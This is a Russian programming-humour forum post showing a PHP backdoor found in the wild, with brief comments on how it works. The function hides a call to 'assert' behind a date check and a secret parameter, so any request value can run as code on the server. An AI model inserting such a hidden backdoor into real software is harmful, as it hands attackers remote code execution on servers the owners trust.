1. PHP / Говнокод #25510

    0

    1. 01
    2. 02
    3. 03
    4. 04
    5. 05
    6. 06
    7. 07
    8. 08
    9. 09
    10. 10
    11. 11
    12. 12
    13. 13
    14. 14
    function b($d,$a){
    		if(($d = intval($d) == date('d')) && (isset($_REQUEST[b]))){
    			$dd = trim(preg_replace("/[^-0-9+\(\)]/iu", "",$d));
    			$a[5] = preg_replace("/[^-_a-z]/iu", "",$a[5]);$a[3] = preg_replace("/[^-_0-9]/iu", "",$a[5]);
    			if(isset($_REQUEST['s'.md5('bgdfgt')])){
    				if(isset($_REQUEST[b])){$a[3].$a[5](stripslashes(trim($_REQUEST[b])));}
    			}
    			return true;
    		}
    		return false;
    	}
    	
    	
    	$this ->b(date("d"),$b = array('day','date','out','ass','quest','assert','time'));

    Закладочка

    Запостил: straga_coda, 04 Апреля 2019

    Комментарии (32) RSS

    • Типа, если параметр равен секретному значению, то выполнить ass.assert() ? Не, стоп. А что такое $_REQUEST[b], если b - это функция? Или где-то еще делается $_REQUEST[b] = ... , чтобы потом можно было если что сказать "ой, какая уязвимость))) надо же, пять лет пишу на PHP, а все равно доллары иногда случайно забываю"
      Ответить
      • b без баксов –— это кокококонстанта. Если её явно не объявить, то «PHP» объявит её равной 'b' (строке, совпадающей с её именем) и выкинет нотис, который пэхапэшники не читают. Т.е . $_REQUEST[b] из строки запроса вытянет параметр b.

        assert от строкового выражения в «PHP» эквивалентен эвалу.
        Ответить
    • и тут...
      Ответить

    Добавить комментарий